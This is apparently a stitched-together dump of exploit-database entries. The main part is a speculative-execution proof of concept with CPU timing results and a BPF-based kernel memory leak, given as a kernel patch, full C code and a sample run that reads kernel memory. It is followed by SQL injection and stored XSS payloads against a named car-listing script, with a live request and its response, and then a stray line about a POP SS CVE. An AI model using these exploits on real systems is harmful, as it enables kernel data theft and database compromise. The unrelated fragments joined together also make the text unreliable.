return 0;
}
if (delay_0 > HIT_THRESHOLD && delay_1 < HIT_THRESHOLD) {
pipeline_flush();
return 1;
}
pipeline_flush();
return -1;
}
int main(void) {
char out[100000];
char *out_ = out;
#ifdef NO_INTERRUPTS
if (mlockall(MCL_CURRENT|MCL_FUTURE) || iopl(3))
err(1, "iopl(3)");
#endif
for (int idx = 0; idx < 16; idx++) {
#ifdef NO_INTERRUPTS
asm volatile("cli");
#endif
pipeline_flush();
long cycles = 0;
int hits = 0;
char results[33] = {0};
/* if we don't break the loop after some time when it doesn't
work, in NO_INTERRUPTS mode with SMP disabled, the machine will lock
up */
while (hits < 32 && cycles < 1000000) {
pipeline_flush();
int res = testfun(idx);
if (res != -1) {
pipeline_flush();
results[hits] = res + '0';
hits++;
}
cycles++;
pipeline_flush();
}
pipeline_flush();
#ifdef NO_INTERRUPTS
asm volatile("sti");
#endif
out_ += sprintf(out_, "%c: %s in %ld cycles (hitrate: %f%%)\n",
secret_read_area[idx], results, cycles, 100*hits/(double)cycles);
}
printf("%s", out);
pipeline_flush();
}
----------------------- END -----------------------
Results:
In the following, "SMP off" means that I have executed this
command:
# for file in /sys/devices/system/cpu/cpu*/online; do echo 0 > $file; done
For the Intel machines, "turbo off" means that I've executed the
following command:
# echo 1 > /sys/devices/system/cpu/intel_pstate/no_turbo
Skylake laptop, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50
$ ./test
0: 00000000000000000000000000000000 in 61944 cycles (hitrate: 0.051660%)
0: 00000000000000000000000000000000 in 36467 cycles (hitrate: 0.087751%)
0: 00000000000000000000000000000000 in 36788 cycles (hitrate: 0.086985%)
0: 00000000000000000000000000000000 in 36800 cycles (hitrate: 0.086957%)
0: 00000000000000000000000000000000 in 35797 cycles (hitrate: 0.089393%)
1: 11111111111111111111111111111111 in 48923 cycles (hitrate: 0.065409%)
1: 11111111111111111111111111111111 in 44525 cycles (hitrate: 0.071870%)
0: 00000000000000000000000000000000 in 44813 cycles (hitrate: 0.071408%)
1: 11111111111111111111111111111111 in 40625 cycles (hitrate: 0.078769%)
1: 11111111111111111111111111111111 in 40897 cycles (hitrate: 0.078245%)
1: 11111111111111111111111111111111 in 39648 cycles (hitrate: 0.080710%)
0: 00000000000000000000000000000000 in 40737 cycles (hitrate: 0.078553%)
1: 11111111111111111111111111111111 in 37850 cycles (hitrate: 0.084544%)
0: 00000000000000000000000000000000 in 46062 cycles (hitrate: 0.069472%)
1: 11111111111111111111111111111111 in 44929 cycles (hitrate: 0.071223%)
1: 11111111111111111111111111111111 in 37465 cycles (hitrate: 0.085413%)
Skylake laptop, SMP off, interrupts off, turbo off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS
$ sudo ./test
0: 00000000000000000000000000000000 in 34697 cycles (hitrate: 0.092227%)
0: 00000000000000000000000000000000 in 32625 cycles (hitrate: 0.098084%)
0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)
0: 00000000000000000000000000000000 in 34680 cycles (hitrate: 0.092272%)
0: 00000000000000000000000000000000 in 32302 cycles (hitrate: 0.099065%)
1: 11111111111111111111111111111111 in 33240 cycles (hitrate: 0.096270%)
1: 11111111111111111111111111111111 in 33738 cycles (hitrate: 0.094849%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 32531 cycles (hitrate: 0.098368%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 32193 cycles (hitrate: 0.099400%)
1: 11111111111111111111111111111111 in 32167 cycles (hitrate: 0.099481%)
1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)
Haswell PC, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50
$ ./test
0: 00000000000000000000000000000000 in 119737 cycles (hitrate: 0.026725%)
0: 00000000000000000000000000000000 in 45340 cycles (hitrate: 0.070578%)
0: 00000000000000000000000000000000 in 39127 cycles (hitrate: 0.081785%)
0: 00000000000000000000000000000000 in 39567 cycles (hitrate: 0.080875%)
0: 00000000000000000000000000000000 in 35164 cycles (hitrate: 0.091002%)
1: 11111111111111111111111111111111 in 33770 cycles (hitrate: 0.094759%)
1: 11111111111111111111111111111111 in 36743 cycles (hitrate: 0.087091%)
0: 00000000000000000000000000000000 in 36749 cycles (hitrate: 0.087077%)
1: 11111111111111111111111111111111 in 35686 cycles (hitrate: 0.089671%)
1: 11111111111111111111111111111111 in 35843 cycles (hitrate: 0.089278%)
1: 11111111111111111111111111111111 in 35826 cycles (hitrate: 0.089321%)
0: 00000000000000000000000000000000 in 35302 cycles (hitrate: 0.090646%)
1: 11111111111111111111111111111111 in 34256 cycles (hitrate: 0.093414%)
0: 00000000000000000000000000000000 in 36604 cycles (hitrate: 0.087422%)
1: 11111111111111111111111111111111 in 36795 cycles (hitrate: 0.086968%)
1: 11111111111111111111111111111111 in 37820 cycles (hitrate: 0.084611%)
Haswell PC, SMP off, interrupts off, turbo off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS
$ sudo ./test
0: 00000000000000000000000000000000 in 32770 cycles (hitrate: 0.097650%)
0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)
0: 00000000000000000000000000000000 in 32783 cycles (hitrate: 0.097612%)
0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)
0: 00000000000000000000000000000000 in 37455 cycles (hitrate: 0.085436%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00000000000000000000000000000000 in 39894 cycles (hitrate: 0.080213%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: 11111111111111111111111111111111 in 33845 cycles (hitrate: 0.094549%)
0: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00000000000000000000000000000000 in 44050 cycles (hitrate: 0.072645%)
1: in 1000000 cycles (hitrate: 0.000000%)
1: in 1000000 cycles (hitrate: 0.000000%)
AMD desktop, normal:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99
$ ./test
0: 0000000000000000000000000 in 1000000 cycles (hitrate: 0.002500%)
0: 000000000000000000000 in 1000000 cycles (hitrate: 0.002100%)
0: 00000000000000000000000000000000 in 939816 cycles (hitrate: 0.003405%)
0: 00000000000000000000000000000000 in 903838 cycles (hitrate: 0.003540%)
0: 00000000000000000000000000000000 in 360430 cycles (hitrate: 0.008878%)
1: 11111111111111111111111111111111 in 484242 cycles (hitrate: 0.006608%)
1: 11111111111111111111111111111111 in 331271 cycles (hitrate: 0.009660%)
0: 00000000000000000000000000000000 in 388049 cycles (hitrate: 0.008246%)
1: 11111111111111111111111111111111 in 282588 cycles (hitrate: 0.011324%)
1: 11111111111111111111111111111111 in 359558 cycles (hitrate: 0.008900%)
1: 11111111111111111111111111111111 in 359013 cycles (hitrate: 0.008913%)
0: 0000000000000000000000000000000 in 1000000 cycles (hitrate: 0.003100%)
1: 11111111111111111111111111111111 in 501067 cycles (hitrate: 0.006386%)
0: 00000000000000000000000000000000 in 312420 cycles (hitrate: 0.010243%)
1: 11111111111111111111111111111111 in 784663 cycles (hitrate: 0.004078%)
1: 11111111111111111111111111111111 in 954189 cycles (hitrate: 0.003354%)
AMD desktop, SMP off, interrupts off:
$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99 -DNO_INTERRUPTS
$ sudo ./test
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: in 1000000 cycles (hitrate: 0.000000%)
0: 00 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
1: 11 in 1000000 cycles (hitrate: 0.000200%)
======== assisted BPF PoC ========
This is a PoC that demonstrates that this issue can potentially be
used to attack the Linux kernel's BPF subsystem.
This is *NOT* a full exploit against BPF; this is a PoC that requires
kernel patches that permit the PoC to flush kernel memory from inside
BPF and to measure access times to BPF arrays. It seems probable that
these restrictions could be overcome, but my PoC doesn't do that.
The basic idea here is to cause a speculative type confusion:
1. Store a number N at address A on the stack.
2. Write a pointer P to address A, using a high-latency
expression to compute A.
3. Read a value X from address A, with A specified using a low-latency
expression. Architecturally, X is P; however, microarchitecturally,
X can be N.
4. Use the Spectre/Meltdown gadget to leak the value X points to into
the cache.
The attack benefits from the unique property of eBPF that the engine
performs relatively complicated value tracking, but does not
normally use the resulting information to modify the code in any way
(e.g. by optimizing things away). It is not clear how applicable this
attack would be to e.g. other scripting languages, or whether it is an
issue for non-scripting code.
I have only tested this PoC on an Intel Skylake CPU.
Kernel patch required for the PoC to work (copy attached, so that it
applies cleanly), to be applied to the 4.15.1 stable kernel:
----------------------- START -----------------------
diff --git a/include/linux/bpf.h b/include/linux/bpf.h
index 0b25cf87b6d6..896b4f483fe2 100644
--- a/include/linux/bpf.h
+++ b/include/linux/bpf.h
@@ -591,6 +591,7 @@ extern const struct bpf_func_proto bpf_skb_vlan_push_proto;
extern const struct bpf_func_proto bpf_skb_vlan_pop_proto;
extern const struct bpf_func_proto bpf_get_stackid_proto;
extern const struct bpf_func_proto bpf_sock_map_update_proto;
+extern const struct bpf_func_proto bpf_clflush_mfence_proto;
/* Shared helpers among cBPF and eBPF. */
void bpf_user_rnd_init_once(void);
diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
index 3d24e238221e..379dc888cb81 100644
--- a/kernel/bpf/helpers.c
+++ b/kernel/bpf/helpers.c
@@ -179,3 +179,17 @@ const struct bpf_func_proto bpf_get_current_comm_proto = {
.arg1_type = ARG_PTR_TO_UNINIT_MEM,
.arg2_type = ARG_CONST_SIZE,
};
+
+BPF_CALL_1(bpf_clflush_mfence, void *, target) {
+ asm volatile("mfence\n\tclflush (%0)\n\tmfence"::"r"(target):"memory");
+ return 0;
+}
+
+const struct bpf_func_proto bpf_clflush_mfence_proto = {
+ .func = bpf_clflush_mfence,
+ .ret_type = RET_INTEGER,
+ /* theoretically permits CLFLUSH on invalid addresses,
+ * but the PoC doesn't do that
+ */
+ .arg1_type = ARG_DONTCARE
+};
diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
index 5cb783fc8224..2dd9a2a95630 100644
--- a/kernel/bpf/syscall.c
+++ b/kernel/bpf/syscall.c
@@ -605,6 +605,85 @@ static int map_lookup_elem(union bpf_attr *attr)
return err;
}
+static int map_time_flush_loc(union bpf_attr *attr)
+{
+ void __user *ukey = u64_to_user_ptr(attr->key);
+ void __user *uvalue = u64_to_user_ptr(attr->value);
+ int ufd = attr->map_fd;
+ struct bpf_map *map;
+ void *key, *ptr;
+ struct fd f;
+ int err = 0;
+ u64 delay = 0;
+
+ f = fdget(ufd);
+ map = __bpf_map_get(f);
+ if (IS_ERR(map))
+ return PTR_ERR(map);
+
+ if (!(f.file->f_mode & FMODE_CAN_READ)) {
+ err = -EPERM;
+ goto err_put;
+ }
+
+ if (map->map_type != BPF_MAP_TYPE_ARRAY) {
+ err = -EINVAL;
+ goto err_put;
+ }
+
+ if (attr->flags > 0x100000 || attr->flags >= map->value_size) {
+ err = -EINVAL;
+ goto err_put;
+ }
+ asm volatile("lfence");
+
+ key = memdup_user(ukey, map->key_size);
+ if (IS_ERR(key)) {
+ err = PTR_ERR(key);
+ goto err_put;
+ }
+
+ rcu_read_lock();
+ ptr = map->ops->map_lookup_elem(map, key);
+ if (ptr) {
+ unsigned int t1, t2;
+ ptr = (char*)ptr + attr->flags;
+ asm volatile(
+ "xor %%r11, %%r11\n\t"
+ "lfence\n\t"
+ "rdtscp\n\t"
+ "mov %%eax, %%ebx\n\t"
+ "mov (%%rdi), %%r11b\n\t"
+ "rdtscp\n\t"
+ "mfence\n\t"
+ "clflush (%%rdi)\n\t"
+ "mfence\n\t"
+ ://out
+ "=a"(t2),
+ "=b"(t1)
+ ://in
+ "D"(ptr)
+ ://clobber
+ "r11",
+ "rcx",
+ "rdx",
+ "memory"
+ );
+ delay = t2 - t1;
+ }
+ rcu_read_unlock();
+ if (copy_to_user(uvalue, &delay, 8)) {
+ err = -EINVAL;
+ goto free_key;
+ }
+
+free_key:
+ kfree(key);
+err_put:
+ fdput(f);
+ return err;
+}
+
#define BPF_MAP_UPDATE_ELEM_LAST_FIELD flags
static int map_update_elem(union bpf_attr *attr)
@@ -1713,6 +1792,9 @@ SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr
__user *, uattr, unsigned int, siz
case BPF_MAP_UPDATE_ELEM:
err = map_update_elem(&attr);
break;
+ case 0x13370001:
+ err = map_time_flush_loc(&attr);
+ break;
case BPF_MAP_DELETE_ELEM:
err = map_delete_elem(&attr);
break;
diff --git a/net/core/filter.c b/net/core/filter.c
index 1c0eb436671f..e310a345054c 100644
--- a/net/core/filter.c
+++ b/net/core/filter.c
@@ -3347,6 +3347,8 @@ bpf_base_func_proto(enum bpf_func_id func_id)
return &bpf_tail_call_proto;
case BPF_FUNC_ktime_get_ns:
return &bpf_ktime_get_ns_proto;
+ case 4:
+ return &bpf_clflush_mfence_proto;
case BPF_FUNC_trace_printk:
if (capable(CAP_SYS_ADMIN))
return bpf_get_trace_printk_proto();
----------------------- END -----------------------
The PoC:
----------------------- START -----------------------
*/
#define _GNU_SOURCE
#include <pthread.h>
#include <assert.h>
#include <err.h>
#include <stdint.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <pthread.h>
#include <errno.h>
#include <limits.h>
#include <stdbool.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stddef.h>
#include <signal.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>
#include <sys/user.h>
#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))
/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, /* zero is reserved opcode */ \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_EMIT_CALL(FUNC) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_CALL, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = (FUNC) })
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
#define BPF_LD_ABS(SIZE, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_ALU64_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
int bpf_(int cmd, union bpf_attr *attrs) {
return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}
int array_create(int value_size, int num_entries) {
union bpf_attr create_map_attrs = {
.map_type = BPF_MAP_TYPE_ARRAY,
.key_size = 4,
.value_size = value_size,
.max_entries = num_entries
};
int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
if (mapfd == -1)
err(1, "map create");
return mapfd;
}
unsigned int array_time_flush_loc(int mapfd, uint32_t idx, uint32_t off) {
uint64_t time;
union bpf_attr attr = {
.map_fd = mapfd,
.key = (uint64_t)&idx,
.value = (uint64_t)&time,
.flags = off,
};
int res = bpf_(0x13370001, &attr);
if (res)
err(1, "map flush loc");
return time;
}
void array_set_dw(int mapfd, uint32_t key, uint64_t value) {
union bpf_attr attr = {
.map_fd = mapfd,
.key = (uint64_t)&key,
.value = (uint64_t)&value,
.flags = BPF_ANY,
};
int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);
if (res)
err(1, "map update elem");
}
int prog_load(struct bpf_insn *insns, size_t insns_count) {
char verifier_log[100000];
union bpf_attr create_prog_attrs = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insn_cnt = insns_count,
.insns = (uint64_t)insns,
.license = (uint64_t)GPLv2,
.log_level = 1,
.log_size = sizeof(verifier_log),
.log_buf = (uint64_t)verifier_log
};
int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
int errno_ = errno;
//printf("==========================\n%s==========================\n",
verifier_log);
errno = errno_;
if (progfd == -1)
err(1, "prog load");
return progfd;
}
int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {
int progfd = prog_load(insns, insns_count);
// hook eBPF program up to a socket
// sendmsg() to the socket will trigger the filter
// returning 0 in the filter should toss the packet
int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
err(1, "socketpair");
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
err(1, "setsockopt");
return socks[1];
}
void trigger_proc(int sockfd) {
if (write(sockfd, "X", 1) != 1)
err(1, "write to proc socket failed");
}
int input_map, leak_map;
int sockfds[16];
int leak_bit(unsigned long addr, int bit) {
array_set_dw(input_map, 0, addr);
int count_0 = 0, count_1 = 0;
while (count_0 + count_1 < 100) {
array_time_flush_loc(leak_map, 0, 2048+0x1000);
trigger_proc(sockfds[bit+8]);
unsigned int t1 = array_time_flush_loc(leak_map, 0, 2048+0x1000);
array_time_flush_loc(leak_map, 0, 2048);
trigger_proc(sockfds[bit+0]);
unsigned int t0 = array_time_flush_loc(leak_map, 0, 2048);
//printf("%u %u\n", t0, t1);
if (t0 < 50)
count_0++;
if (t1 < 50)
count_1++;
}
printf("%d vs %d\n", count_0, count_1);
return (count_0 > count_1) ? 0 : 1;
}
int leak_byte(unsigned long addr) {
int byte = 0;
for (int bit=0; bit<8; bit++) {
byte |= leak_bit(addr, bit)<<bit;
}
return byte;
}
int main(int argc, char **argv) {
setbuf(stdout, NULL);
input_map = array_create(8, 1);
leak_map = array_create(0x3000, 1);
if (argc != 3)
errx(1, "invocation (expects addr and length)");
#define BPF_REG_CONFUSED_SLOT BPF_REG_6
#define BPF_REG_SLOW_SLOT BPF_REG_7
#define BPF_REG_CONFUSED_SLOT_ALIAS BPF_REG_8
#define BPF_REG_LEAK_ARRAY BPF_REG_9
#define BPF_REG_CONFUSED BPF_REG_1
#define BPF_REG_SECRET_VALUE BPF_REG_2
#define BPF_REG_DUMMY_SLOT BPF_REG_3
for (int i=0; i<16; i++) {
bool dummy_ff = (i >= 8);
int selected_bit = i & 7;
struct bpf_insn insns[] = {
/* setup: write 0x00 or 0xff to -216 to get a big stack
allocation and to prepare dummy */
BPF_ST_MEM(BPF_B, BPF_REG_FP, -216, dummy_ff ? 0x00 : 0xff),
/* setup: compute stack slot pointers to :
* - type-confused stack slot (at -72)
* - pointer to type-confused stack slot (at -144)
*/
BPF_MOV64_REG(BPF_REG_CONFUSED_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_CONFUSED_SLOT, -72),
BPF_MOV64_REG(BPF_REG_SLOW_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_SLOW_SLOT, -144),
//BPF_MOV64_REG(BPF_REG_0, BPF_REG_FP),
//BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -216),
/* write to dummy slot (to make a big stack and to permit later read) */
//BPF_ST_MEM(BPF_DW, BPF_REG_0, 0, 0),
/* setup: store victim memory pointer in BPF_REG_CONFUSED_SLOT */
BPF_LD_MAP_FD(BPF_REG_ARG1, input_map),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),
BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT, BPF_REG_0, 0),
/* setup: spill pointer to type-confused stack slot */
BPF_STX_MEM(BPF_DW, BPF_REG_SLOW_SLOT, BPF_REG_CONFUSED_SLOT, 0),
/* setup: load pointer to leak area into register */
BPF_LD_MAP_FD(BPF_REG_ARG1, leak_map),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 2048), /* leak_map+2048 */
BPF_MOV64_REG(BPF_REG_LEAK_ARRAY, BPF_REG_0),
/* CHEATED: fence and flush */
BPF_MOV64_REG(BPF_REG_1, BPF_REG_SLOW_SLOT),
BPF_EMIT_CALL(4/*clflush_mfence*/),
BPF_MOV64_REG(BPF_REG_DUMMY_SLOT, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_DUMMY_SLOT, -216),
/* START CRITICAL PATH */
BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,
BPF_REG_SLOW_SLOT, 0), /* high-latency read of slot address */
BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,
BPF_REG_DUMMY_SLOT, 0), /* bypassed store via high-latency address */
BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED, BPF_REG_CONFUSED_SLOT, 0),
BPF_LDX_MEM(BPF_B, BPF_REG_SECRET_VALUE, BPF_REG_CONFUSED, 0),
BPF_ALU64_IMM(BPF_AND, BPF_REG_SECRET_VALUE, 1<<selected_bit),
/* 0 or 1 */
BPF_ALU64_IMM(BPF_LSH, BPF_REG_SECRET_VALUE, 12-selected_bit),
/* 0 or 0x1000 */
BPF_ALU64_REG(BPF_ADD, BPF_REG_LEAK_ARRAY, BPF_REG_SECRET_VALUE),
BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_LEAK_ARRAY, 0),
/* END CRITICAL PATH */
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
};
sockfds[i] = create_filtered_socket_fd(insns, ARRSIZE(insns));
puts("BPF PROG LOADED SUCCESSFULLY");
}
/*
puts("testing flushed...\n");
for (int i=-1; i<10; i++) {
unsigned int res = array_time_flush_loc(leak_map, 0, 2048);
if (i >= 0)
printf(" %u\n", res);
}
*/
unsigned long base_addr = strtoull(argv[1], NULL, 16);
for (int i=0; i<atoi(argv[2]); i++) {
unsigned long addr = base_addr + i;
unsigned char leaked = leak_byte(addr);
printf("%016lx: 0x%02hhx ('%c')\n", addr, leaked, leaked);
}
return 0;
}
*/
----------------------- END -----------------------
PoC usage:
$ sudo grep core_pattern /proc/kallsyms
ffffffff9b2954e0 D core_pattern
$ gcc -o bpf_store_skipper_assisted bpf_store_skipper_assisted.c
$ time ./bpf_store_skipper_assisted ffffffff9b2954e0 5
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
BPF PROG LOADED SUCCESSFULLY
4 vs 96
1 vs 99
100 vs 0
100 vs 0
100 vs 0
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e0: 0x63 ('c')
2 vs 98
1 vs 99
1 vs 99
1 vs 99
100 vs 0
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e1: 0x6f ('o')
100 vs 0
3 vs 97
100 vs 0
100 vs 0
1 vs 99
2 vs 98
0 vs 100
100 vs 0
ffffffff9b2954e2: 0x72 ('r')
2 vs 98
100 vs 0
0 vs 100
100 vs 0
100 vs 0
0 vs 100
0 vs 100
100 vs 0
ffffffff9b2954e3: 0x65 ('e')
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
100 vs 0
ffffffff9b2954e4: 0x00 ('')
real 0m31.591s
user 0m2.547s
sys 0m27.429s
*/
# Exploit Title: Auto car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/auto-car-car-listing-script/19221368?s_rank=1159
# Version: 1.2
# Tested on: Win 10
# POC 1: SQLi:
# Parameter: car_title
# Type: Error based
# Payload: 1' and extractvalue(1,Concat(0x3a,user(),0x3a))#
# test: http://target/scripts/autocar_preview/
# Request:
POST /scripts/autocar_preview/search-cars HTTP/1.1
Host: kamleshyadav.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://kamleshyadav.com/scripts/autocar_preview/
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Connection: keep-alive
Upgrade-Insecure-Requests: 1
car_title=1' and extractvalue(1,Concat(0x3a,user(),0x3a))#
# Response:
HTTP/1.1 500 Internal Server Error
Server: nginx/1.12.2
Date: Tue, 22 May 2018 14:36:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1371
Connection: keep-alive
<h1>A Database Error Occurred</h1>
<p>Error Number: 1105</p><p>XPATH syntax error:
':kamleshy_event@localhost:'</p><p>SELECT
*
FROM `autocar_car_details`
WHERE `car_status` = 1 AND `car_title` LIKE '%1' and
extractvalue(1,Concat(0x3a,user(),0x3a))#%'</p>
# POC 2: Cross site scripting:
1) Create your account and navigate to "edit profile"
2) Put this payload in "name" and update your profile:
<script>alert('xss')</script>
3) You will have an alert box in your page .
Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.
